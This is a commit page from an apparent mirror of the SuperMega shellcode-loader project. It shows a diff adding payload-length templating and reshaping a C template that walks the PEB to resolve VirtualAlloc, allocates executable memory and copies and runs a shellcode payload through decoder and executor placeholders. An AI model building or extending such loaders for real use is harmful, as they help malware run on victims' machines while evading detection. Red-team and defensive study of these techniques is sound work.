admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-03 01:27:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: peb_walk template

Browse Source
This commit is contained in:
Dobin
2024-02-18 22:51:10 +00:00
parent 31737f2845
commit 2029be0ce8
2 changed files with 11 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
phases/templater.py
+3
View File
@@ -46,6 +46,9 @@ def create_c_from_template(
filepath = "plugins/executor/{}.c".format(exec_style.value) filepath = "plugins/executor/{}.c".format(exec_style.value)
with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file: with open("plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
plugin_executor = file.read() plugin_executor = file.read()
plugin_executor = Template(plugin_executor).render({
'PAYLOAD_LEN': payload_len,
})
if source_style == SourceStyle.peb_walk: if source_style == SourceStyle.peb_walk:
if use_templates: if use_templates:
source/peb_walk/template.c
+8 -7
View File
@@ -85,14 +85,15 @@ int main()
_In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str); _In_ DWORD flProtect)) _GetProcAddress((HMODULE)base, VirtualAlloc_str);
if (_VirtualAlloc == NULL) return 4; if (_VirtualAlloc == NULL) return 4;
char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40); char *dest = _VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
// 11223344 is a magic number which will be replaced in the asm source
// with the payload length.
for(int n=0; n<{{PAYLOAD_LEN}}; n++) {
dest[n] = supermega_payload[n];
}
// Exec shellcode // Copy
(*(void(*)())(dest))(); // from: supermega_payload[]
// to: dest[]
// len: 0x11223344
{{ plugin_decoder }}
// Execute *dest
{{ plugin_executor }}
return 0; return 0;
} }